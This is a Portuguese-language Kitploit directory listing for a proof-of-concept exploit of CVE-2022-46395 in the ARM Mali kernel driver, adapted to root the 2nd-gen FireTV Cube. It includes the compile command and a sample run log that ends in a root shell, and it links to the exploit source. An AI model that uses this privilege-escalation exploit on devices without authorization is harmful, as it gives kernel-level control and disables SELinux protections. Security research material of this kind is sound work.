Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE_2022_46395_Raven — CVE-2022-46395 POC para FireTV Cube 2ª geração (raven) | Kitploit
Ferramentas/GitHubGitHub/pro-me3us/cve_2022_46395_raven
Segurança AndroidEscalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoExploração de Binários
GitHubpro-me3us/cve_2022_46395_raven

CVE_2022_46395_Raven

CVE-2022-46395 POC para FireTV Cube 2ª geração (raven)

Ver Repositório
13há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit da CVE-2022-46395 para rodar no FireTV Cube de 2ª geração

Este é um fork do POC do Pixel 6 do pesquisador de segurança Man Yue Mo para a CVE-2022-46395. Leia sua análise detalhada da vulnerabilidade aqui. Foram feitas alterações para considerar o espaço de usuário de 32 bits do FireOS. O POC explora uma falha no driver de kernel ARM Mali para obter execução arbitrária de código no kernel, que é então usada para desabilitar o SELinux e obter root.

O exploit foi corrigido no PS7652/3564 (final de agosto de 2023). Para referência, o seguinte comando foi usado para compilar com clang no ndk-21:

root@kitploit:~
android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi28-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o raven_buf

Para obter os resultados mais rápidos, execute logo após uma reinicialização. Em média, o POC leva de 2 a 5 minutos para obter root.

root@kitploit:~
raven:/ $ /data/local/tmp/raven_buf
Amazon/raven/raven:9/PS7646.3565N/0028085972224:user/amz-p,release-keys
benchmark_time 138
failed after 100
finished reset: 342278966 fault: 338143633 195 err 0 read 3
failed to find pgd, retry
finished reset: 731402639 fault: 724605931 208 err 0 read 3
failed to find pgd, retry
finished reset: 67309348 fault: 66434848 210 err 0 read 3
failed to find pgd, retry
failed after 200
failed after 300
benchmark_time 135
failed after 400
failed after 500
failed after 600
benchmark_time 131
failed after 700
finish reset: 797174916 fault: 788811083 352 err 0 read 3
found pgd at page 6
overwrite addr : 104100634 634
overwrite addr : 104300634 634
overwrite addr : 1041001d0 1d0
overwrite addr : 1043001d0 1d0
result 50
raven:/ #
Baixar ferramenta